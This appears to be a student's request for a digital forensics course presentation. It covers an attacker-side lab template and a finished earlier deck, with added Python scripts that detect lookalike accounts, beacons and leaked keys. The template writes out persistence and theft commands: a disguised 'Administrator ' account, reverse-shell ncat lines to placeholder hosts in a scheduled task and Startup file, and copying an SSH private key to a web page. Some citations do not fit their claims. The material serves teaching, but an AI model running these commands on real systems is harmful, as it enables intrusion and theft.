Hacker leverages stolen credentials and performs post-exploitation tasks

Description

Please review the Scenario and fill in the PowerPoint slides for Project 2. Please include bullet points as well as notes so that I may read it as a script. This project has to be narrated, so it is very important the notes read like a script (about 5 minutes long). I included Project 1 (which is finished) for reference, as Project 2 builds off of that. Add references.



Read Scenario:
An attacker who regularly scans websites with Directory Buster, or dirb (a tool built into Kali Linux), finds the hidden URL and then decodes the Base64-encoded password. The attacker then scans the remote system, discovers that SSH (Secure Shell, port 22) and RDP (Remote Desktop Protocol, port 3389) are both open, and logs in over SSH with the username and the decoded password. This initial login is technically when the network intrusion starts. After successfully logging in, the attacker begins some post-exploitation tasks. The attacker creates a second administrator account whose name ends in a space (so it looks like the built-in Administrator account) and adds that fake administrator account to the local Administrators group. The hacker then enumerates services and stops a service. The attacker then creates a scheduled task to beacon to a malicious host every day. The hacker also adds a malicious batch file to the Administrator's Startup folder. Finally, the attack becomes a much more serious problem as the attacker is able to view the private SSH host key and take it out of the network by appending it to the default.htm file in the hidden directory. In this Project (2), you will act as the attacker, creating artifacts for the Forensic Analyst to discover. These artifacts will be examined in the final Project (3) in this course.
Digital Forensics Technology and Practices:
Project 2 – The Hacker Attacks
CST 640 9040
Note: Voice Narration is required for Project 2
Example narration
Project 2 – Introduction
• Include Voice Narration in Your Slides
• Talk about the purpose of the Project 2
• Discuss Common Hacker Activity
• Discuss any critical points related to artifacts being created by the attacker
• Erase all of the directions provided in this text box when you submit the project
In our Last Episode – Credentials Extracted
• Make sure that you have done all of the steps in Project 1 for Project 2 to work
• Explain how the hacker got into the system
• Notice that the username and the Base64-encoded password are exposed.
• Erase all of the directions provided in this text box when you submit the project
• Post a screenshot of the harvested credentials.
Base64 Decode
• The hacker obtained the credentials from Directory Buster (dirb)
• On Kali, go to Applications, Usual Applications, Internet, Firefox ESR
• Go to https://gchq.github.io/CyberChef/
• Drag the "From Base64" operation into the Recipe column
• Paste the Base64 text into the Input field and click Bake
• Provide a screenshot of the output
• Erase all of the directions provided in this text box
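The same decode, scripted, as an added example (this code is not part of the course materials or the student's project; the hidden page text and the encoded value in it are constructed for the example). It scans page text for Base64-looking tokens and keeps only those that validate and decode to printable text, which is the check a practitioner wants so that ordinary words that happen to be made of Base64 characters are not reported as credentials:

```python
import base64
import binascii
import re
import string

# Constructed sample of a hidden page that leaks credentials, in the spirit of the
# dirb scenario above; the names and the encoded value are invented for this example.
SAMPLE_HIDDEN_PAGE = """<html><body>
<!-- web admin credentials -->
<p>username: chrisadmin</p>
<p>password: Y2hyaXM=</p>
<p>session: AAAAAAAAAAAA</p>
</body></html>"""

# A run of Base64 alphabet characters with optional padding, not glued to other Base64 characters.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{4,}={0,2}(?![A-Za-z0-9+/=])")

# Printable ASCII without vertical tab / form feed, which never appear in real credentials.
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def decode_if_base64(token):
    """Decode token if it is well-formed Base64 whose plaintext is printable ASCII; else None.

    Strict validation (length, alphabet, padding, printable result) keeps words such as
    'html' or 'password', which are made of Base64 characters, from producing binary
    garbage that a naive decoder would report as a hit.
    """
    if len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text or any(ch not in PRINTABLE for ch in text):
        return None
    return text


def find_encoded_secrets(page_text):
    """Map every Base64 token in page_text that decodes to readable text onto its plaintext."""
    found = {}
    for match in B64_TOKEN.finditer(page_text):
        token = match.group(0)
        decoded = decode_if_base64(token)
        if decoded is not None:
            found[token] = decoded
    return found


if __name__ == "__main__":
    for token, plaintext in find_encoded_secrets(SAMPLE_HIDDEN_PAGE).items():
        print(f"{token} -> {plaintext!r}")
```

The all-zero token is rejected by the printable check and the HTML words by the ASCII check; only the real credential survives, which is the point: Base64 hides nothing from anyone who bothers to decode it.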
The attacker will Nmap for more information
• nmap -Pn 10.138.X.X, using the IP address of your Windows machine (-Pn skips host discovery, because Windows hosts commonly drop ping and would otherwise be reported as down)
• Discuss the relevant Open Ports
• in a few bullet points …
• Erase all of the directions provided in this text box
SSH into the Windows Victim
• ssh -l yournameadmin 10.138.X.X (the IP address of your Windows machine; that is a lowercase L, not a 1)
• Enter the password of yourname
• Show your screenshot of your connection to the victim
• Discuss the situation in a few bullet points …
• Erase all of the directions provided in this text box
Add an Administrative Account
• As the attacker, add an administrative account to the system called "Administrator " (note the trailing space inside the quotes; in most listings it is indistinguishable from the built-in Administrator account)
• net user "Administrator " P@ssw0rd /add
• net localgroup administrators "Administrator " /add
• Discuss why the hacker would do this in a few bullet points …
• Erase all of the directions provided in this text box when you submit the project
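Why the trailing space matters is easiest to see from the forensic side. The following added example (not part of the course materials; the account list is constructed, and the confusable-character table is a small assumed one) normalizes local account names and reports any that collide with a built-in account only after whitespace, zero-width characters, case and look-alike letters are stripped. Names are handled as strings, as PowerShell's Get-LocalUser returns them, because net user's column layout swallows the trailing space:

```python
import unicodedata

# Built-in local accounts that a lookalike would most plausibly imitate (assumed list; extend for
# your environment, e.g. with service or domain accounts).
BUILTIN_ACCOUNTS = {"administrator", "guest", "defaultaccount", "wdagutilityaccount"}

# Cyrillic letters that render like Latin ones; a small assumed table, not an exhaustive confusables list.
CONFUSABLES = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c", "\u0445": "x",
    "\u0410": "A", "\u0415": "E", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0425": "X",
})

ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}


def normalize_account_name(name):
    """Collapse the tricks a lookalike name can use: compatibility forms, confusable letters,
    whitespace anywhere, zero-width characters, and case."""
    folded = unicodedata.normalize("NFKC", name).translate(CONFUSABLES)
    folded = "".join(ch for ch in folded if ch not in ZERO_WIDTH and not ch.isspace())
    return folded.casefold()


def classify_difference(raw):
    """Describe which trick made raw differ from its normalized form."""
    if raw != raw.strip():
        return "leading/trailing whitespace"
    if any(ch.isspace() or ch in ZERO_WIDTH for ch in raw):
        return "embedded whitespace or zero-width characters"
    return "confusable or non-ASCII characters"


def find_lookalike_accounts(names):
    """Return (raw_name, impersonated_builtin, reason) for names that equal a built-in only
    after normalization. The genuine built-in is skipped: Windows account names are
    case-insensitive, so casefold alone already equals the normalized form."""
    hits = []
    for raw in names:
        norm = normalize_account_name(raw)
        if norm in BUILTIN_ACCOUNTS and raw.casefold() != norm:
            hits.append((raw, norm, classify_difference(raw)))
    return hits


def find_colliding_accounts(names):
    """Group any account names (built-in or not) that collapse to the same normalized form."""
    groups = {}
    for raw in names:
        groups.setdefault(normalize_account_name(raw), []).append(raw)
    return {norm: raws for norm, raws in groups.items() if len(raws) > 1}


# Constructed list of local account names as an analyst might export them with
# Get-LocalUser | Select-Object -ExpandProperty Name (string objects keep the trailing space).
SAMPLE_ACCOUNTS = [
    "Administrator",
    "Administrator ",          # the account created in the steps above: trailing space
    "chrisadmin",
    "DefaultAccount",
    "Guest",
    "\u0410dministrator",      # Cyrillic capital A in place of Latin A
    "WDAGUtilityAccount",
]

if __name__ == "__main__":
    for raw, builtin, reason in find_lookalike_accounts(SAMPLE_ACCOUNTS):
        print(f"{raw!r} impersonates {builtin}: {reason}")
```

On a real system the same names should also be cross-checked against Security event 4720 (account created) and 4732 (member added to a local group), which record the exact string, space included, that the net user and net localgroup commands above submit.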
Stop A Service
• Type net start to enumerate all of the started services.
• Stop the Windows Time service by typing net stop "Windows Time" (the quotes are required because the display name contains a space)
• Take a screenshot
• Tell what services that you think a hacker might want to stop and why
• Erase all of the directions provided in this text box
Creating a Scheduled Task (Backdoor)
• Run these commands on your system, replacing yourname.com with yourfirstname.com
• schtasks /create /sc DAILY /tn PROJECT2 /tr "ncat -c yourname.com -e cmd.exe"
• Note: in ncat, -c (--sh-exec) and -e (--exec) both take a command to run and cannot be combined, and no port is given, so this command will not actually connect anywhere (a working reverse shell has the form ncat <host> <port> -e cmd.exe). The task is still created, and the task definition itself is the artifact Project 3 looks for.
• Post your screenshot(s) here
• Discuss the schtasks command
• Tell what tasks you think a hacker might want to schedule, and why
• Erase all of the directions provided in this text box when you submit the project
Adding a Batch File to Startup
• Run these commands on your system, replacing yourname with your first name in both the file name and the hostname
• echo ncat -C yourname.com -e cmd.exe > yourname.bat
• copy yourname.bat "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
• Note: in ncat, -C means --crlf, not a connect option; as with the scheduled task, the batch file is an artifact rather than a working beacon
• Post your two screenshots here
• Discuss the Startup folder and why a hacker might leverage it
• Erase all of the directions provided in this text box when you submit the project
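Both persistence mechanisms leave artifacts that the Forensic Analyst can triage with a short script. The following added example (not part of the course materials; the schtasks CSV excerpt and the Startup-folder contents are constructed, and the indicator list is an assumed starting point) parses schtasks /query /fo CSV /v output and a listing of the Administrator's Startup folder, and flags entries whose command looks like a beacon:

```python
import csv
import io
import re

# Command-line patterns in a task action or startup script that deserve analyst attention
# (assumed starter list: remote-shell tools, common LOLBins, and encoded PowerShell).
SUSPICIOUS_ACTION = re.compile(
    r"\b(ncat|nc|nc64|netcat|mshta|certutil|bitsadmin|regsvr32|rundll32)\b"
    r"|powershell\S*\s.*-(e|ec|enc|encodedcommand)\b"
    r"|\s-e\s+cmd\.exe\b",
    re.IGNORECASE,
)

# Constructed excerpt of `schtasks /query /fo CSV /v` output (columns cut down to the ones used
# here; the real command emits many more). The PROJECT2 row mirrors the task created above.
SAMPLE_SCHTASKS_CSV = (
    '"HostName","TaskName","Status","Author","Task To Run","Schedule Type","Run As User"\n'
    '"WIN-VICTIM","\\PROJECT2","Ready","WIN-VICTIM\\chrisadmin",'
    '"ncat -c chris.com -e cmd.exe","Daily","chrisadmin"\n'
    '"WIN-VICTIM","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Ready","Microsoft Corporation",'
    '"%windir%\\system32\\defrag.exe -c -h -o -$","Weekly","SYSTEM"\n'
)

# Constructed contents of the Administrator's Startup folder, keyed by full path.
STARTUP_DIR = r"C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_STARTUP_FILES = {
    STARTUP_DIR + r"\chris.bat": "ncat -C chris.com -e cmd.exe\r\n",
    STARTUP_DIR + r"\desktop.ini": "[.ShellClassInfo]\r\nLocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21787\r\n",
}

# File types that run when the user logs on; anything else in Startup is inert.
EXECUTABLE_STARTUP = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".exe", ".lnk", ".hta")


def flag_scheduled_tasks(csv_text):
    """Return the rows of schtasks CSV output whose action matches SUSPICIOUS_ACTION."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        action = row.get("Task To Run", "")
        if SUSPICIOUS_ACTION.search(action):
            hits.append({
                "task": row["TaskName"],
                "action": action,
                "author": row.get("Author", ""),
                "run_as": row.get("Run As User", ""),
                "schedule": row.get("Schedule Type", ""),
            })
    return hits


def flag_startup_items(files):
    """Return every executable item in the Startup folder; ones whose content matches
    SUSPICIOUS_ACTION are marked as beacon-like, the rest are listed for manual review."""
    hits = []
    for path, content in files.items():
        if not path.lower().endswith(EXECUTABLE_STARTUP):
            continue
        reason = "beacon-like command" if SUSPICIOUS_ACTION.search(content) else "executable placed in Startup"
        hits.append({"path": path, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in flag_scheduled_tasks(SAMPLE_SCHTASKS_CSV):
        print("task:", hit)
    for hit in flag_startup_items(SAMPLE_STARTUP_FILES):
        print("startup:", hit)
```

The task row carries the author and run-as account, which is how the analyst links the backdoor back to the yournameadmin session used to create it; the Microsoft defrag task is left alone because its action matches none of the indicators.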
Stealing Data
• cd C:\ProgramData\ssh
• dir
• type ssh_host_rsa_key
• type ssh_host_rsa_key >> C:\inetpub\wwwroot\hidden\index.htm
• Talk about the significance of the private key
• Erase all of the directions provided in this text box when you submit the project
Data Exfiltration
• On Kali, go to Applications, Usual Applications, Internet, Firefox ESR
• Browse to http://10.138.X.X/hidden/index.htm (IP address of your Windows machine)
• Post a Screenshot
• Explain what data exfiltration is
• erase all of the directions provided
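To confirm what was exfiltrated, the analyst has to find private-key material in the webroot and tie it to the host key on disk. The following added example (not part of the course materials; the webroot snapshot and the key body are constructed, and the key body is deliberately not a real key) does both, normalizing line endings before hashing so that a key which passed through CRLF-converting tools still matches:

```python
import hashlib
import re

# Any PEM private-key block (OPENSSH, RSA, EC, ENCRYPTED, or bare PRIVATE KEY);
# the END label must repeat the BEGIN label.
PEM_PRIVATE_KEY = re.compile(
    r"-----BEGIN ((?:[A-Z]+ )?PRIVATE KEY)-----\r?\n(.*?)\r?\n-----END \1-----",
    re.DOTALL,
)

# Constructed stand-in for C:\ProgramData\ssh\ssh_host_rsa_key. The body is NOT a real key,
# only Base64 text shaped like one, so nothing here can be misused.
FAKE_HOST_KEY = (
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWg==\n"
    "-----END OPENSSH PRIVATE KEY-----\n"
)

# Constructed webroot snapshot. index.htm received the key via `type ... >>` as in the steps
# above; `type` copies the bytes unchanged, but the page it was appended to uses CRLF.
SAMPLE_WEBROOT = {
    r"C:\inetpub\wwwroot\hidden\index.htm": "<html><body>admin notes</body></html>\r\n" + FAKE_HOST_KEY,
    r"C:\inetpub\wwwroot\hidden\default.htm": "<html><body>nothing here</body></html>\r\n",
    r"C:\inetpub\wwwroot\iisstart.htm": "<html><body>IIS</body></html>\r\n",
}


def key_fingerprint(pem_text):
    """SHA-256 of the PEM block with line endings and surrounding whitespace normalized, so the
    same key copied through CRLF-converting tools or editors still compares equal."""
    lines = pem_text.replace("\r\n", "\n").strip().splitlines()
    canonical = "\n".join(line.strip() for line in lines)
    return hashlib.sha256(canonical.encode()).hexdigest()


def find_private_keys(files):
    """Return (path, key_label, fingerprint) for every PEM private key embedded in any file."""
    hits = []
    for path, content in files.items():
        for match in PEM_PRIVATE_KEY.finditer(content):
            hits.append((path, match.group(1), key_fingerprint(match.group(0))))
    return hits


def leaked_copies_of(host_key_text, files):
    """Paths whose embedded key is identical (after normalization) to the host key on disk."""
    wanted = key_fingerprint(host_key_text)
    return sorted(path for path, _label, fp in find_private_keys(files) if fp == wanted)


if __name__ == "__main__":
    for path, label, fp in find_private_keys(SAMPLE_WEBROOT):
        print(f"{path}: {label} sha256={fp[:16]}...")
    print("copies of host key:", leaked_copies_of(FAKE_HOST_KEY, SAMPLE_WEBROOT))
```

A match against the host key is what turns "a key was found in the webroot" into "the SSH host key of this server is compromised", which means the host key must be regenerated and clients re-pinned, not just the page cleaned up.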
Summary
• Talk about the Tools and Technologies used
• Talk about what happened
• Talk about what the hacker did when he got in
References
Digital Forensics Technology and Practices:
Project 1 – A Network Intrusion
CST 640 9040
Chris Noocha
October 22, 2023
Project 1 – Introduction
•The purpose of this presentation is to investigate a network intrusion incident
involving a website administrator hired by Mercury USA.
•The website administrator violated their contract by accessing systems outside of the
allowed RDP protocol. They also created a major security risk by storing credentials in
a hidden, unindexed folder on one of the websites they managed.
• As an extra precaution, they Base64 encoded the password, but an attacker was still
able to uncover this folder and decode the password using directory busting tools like
dirb.
•The website administrator should not have had carte blanche admin access that
allowed them to create hidden folders on websites. Credentials should be stored in
secure repositories, not hidden on random websites.
MARS Linux System
MARS provides a safe, controlled environment to examine the incident and attacker’s
methods (Aslam et al., 2023).
•Using Kali Linux in MARS allows access to a range of security tools for this network
intrusion investigation.
• Kali Linux is a penetration testing and ethical hacking Linux distribution that comes preinstalled with many security and hacking tools such as Nmap, Wireshark, and John the Ripper.
MARS Windows System
• MARS gives a controlled Windows environment in which to apply investigative skills.
• Using the Windows 10 desktop in the MARS lab environment provides access to Windows-based tools and analysis methods for investigating this incident (Umbaugh, 2023).
• The IP address is 10.138.6.255 with subnet mask 255.255.240.0 and default gateway 10.138.0.1. The analyst can examine Windows event logs, the registry, the file system, etc. for artifacts.
IIS Setup
•IIS stands for Internet Information Services, Web server application developed by
Microsoft for Windows systems.
•Allows hosting web applications, sites, and services on Windows servers.
• Supports the HTTP, HTTPS, FTP and TLS/SSL protocols, and hosts application technologies such as CGI and ASP.NET
•Includes authentication, authorization, and security features
•IIS Allows centralized and remote management of web content.
Security Policy Changes
•Password policies enforce complexity and strength requirements. This makes passwords
much harder for attackers to guess or crack through brute force attacks.
•Can require minimum length, mix of characters, change frequency. Setting password
requirements prevents the use of simple, weak, or repetitive passwords.
•Prevents use of common or repetitive passwords. Password policies block easily guessed
passwords like “password123” to improve security.
•Locks accounts after repeated failed login attempts. Account lockouts upon too many failed
logins thwart brute force password cracking attempts.
Adding an Administrative Account
• The net user command in Windows is used to create and manage user accounts. It allows creating a new user, setting a password, and configuring account options from the command line.
• Specific parameters like /add can be used with net user to add a new user account to the system, as shown in the screenshot where a chrisadmin account was created.
• The net localgroup command manages local groups on a Windows system, including adding and removing members (Thomas, 2022).
• It can add user accounts to the built-in Administrators group to grant them full admin privileges on the local system.
Base64 Lesson
• CyberChef is an online tool for encryption, encoding, compression, and data analysis. It contains over 300 operations, including Base64 encoding and decoding.
• Base64 is an encoding scheme that represents binary data as text using an alphabet of 64 characters (plus = for padding). It is commonly used to carry binary data such as e-mail attachments, or credentials in HTTP Basic authentication headers, over text-only channels.
• Base64 is reversible by anyone and is not encryption; it provides no confidentiality. CyberChef makes it easy to decode Base64 strings found during an investigation, which is exactly why storing a password this way only obfuscates it rather than protecting it.
Website Misconfiguration

dirb attack on the Windows Server

Credentials Extracted
• Improper permissions – Overly permissive permissions on files/folders can let attackers access sensitive data or upload malicious code.
•Unpatched software – Running outdated CMS, plugins, themes with known vulnerabilities
provides entry for exploits.
•Default credentials – Failure to change default usernames and passwords for admin panels
gives access to attackers.
•Information leakage – Revealing directory structures, source code comments, or stack traces
aids reconnaissance.
Summary

Tools like Kali Linux, Windows forensics, and CyberChef enabled investigation. This allowed thorough examination
of the incident using specialized security software.
• Website administrator improperly stored credentials in Base64 encoded file. This risky behavior violated contract
terms and created a security vulnerability.
• Attacker used Kali Linux tools for directory busting to find hidden folder. Common hacking tools and techniques
exposed the administrator’s poor security practices.
• Base64 encoding was decoded with CyberChef to reveal credentials. The weak obfuscation was easily reversed, compromising the entire system.
• Incident shows importance of access controls, credential management, and monitoring. Standard security best
practices could have prevented or reduced impact of the intrusion.
References
Aslam, M. M., Tufail, A., Kim, K. H., Apong, R. A. A. H. M., & Raza, M. T. (2023). A Comprehensive Study on
Cyber Attacks in Communication Networks in Water Purification and Distribution Plants: Challenges,
Vulnerabilities, and Future Prospects. Sensors, 23(18), 7999.
Umbaugh, S. E. (2023). Digital image processing and analysis: computer vision and image analysis. CRC
Press.
Thomas, O. (2022). Exam Ref AZ-801 Configuring Windows Server Hybrid Advanced Services. Microsoft
Press.
